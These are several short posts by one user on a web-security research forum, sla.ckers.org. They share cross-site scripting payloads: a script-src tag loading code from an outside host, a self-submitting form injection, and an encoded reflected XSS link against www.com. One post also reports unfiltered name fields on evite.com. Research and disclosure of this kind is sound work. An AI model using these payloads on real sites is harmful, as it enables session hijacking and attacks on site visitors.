Sla.ckers.org
The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Results 1 - 6 of 6
5 years ago
badsamaritan
Script src for IE requires http:// for IE 7 as far as I can tell: <script/src=http://t-t.am></script> :35 I like your method kuza, but it's in a "profile".. not in a GET string
Forum: XSS Info
5 years ago
badsamaritan
I was "looking" at a site that had an unfiltered field in it, and you could put whatever you wanted. The problem was it was limited to 31 characters. <script src="http://"></script> was over my limit without a URL; <script src="http://" /> doesn't even work. I do have control over other parts of the page, but just <script>innerHTML</s
Forum: XSS Info
5 years ago
badsamaritan
<form method=post action=post.php><input name=content><input type=image onerror="(f=this.form).content.value=f.parentNode.innerHTML;alert('xss');f.submit()"src=></form>
Forum: XSS Info
5 years ago
badsamaritan
On evite.com, when you create or edit an account, your first and last name have no filtering at all. When you create an evite or reply to one, your name is displayed for everyone :)... therefore XSS on any evite you create or are invited to. I would give you a PoC but I would have to invite you all to my party.. and I don't like you guys THAT much ;) ps: so much fun to play with the DOM to ch
Forum: Full Disclosure
5 years ago
badsamaritan
Hi everyone, my name is Matt and I'm a recovering slacker...... I was referenced once in this blog post: http://ha.ckers.org/blog/20070310/my-lunch-with-samy/ but really didn't have much to say with those two in the room :p I really like how clean and pro the forum has been kept, and I am impressed by some of the names I see on here. Keep up the great work, everyone.
Forum: Intro
5 years ago
badsamaritan
WWW.com The XSS Starts Here http://www.www.com/search.php?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
Forum: Full Disclosure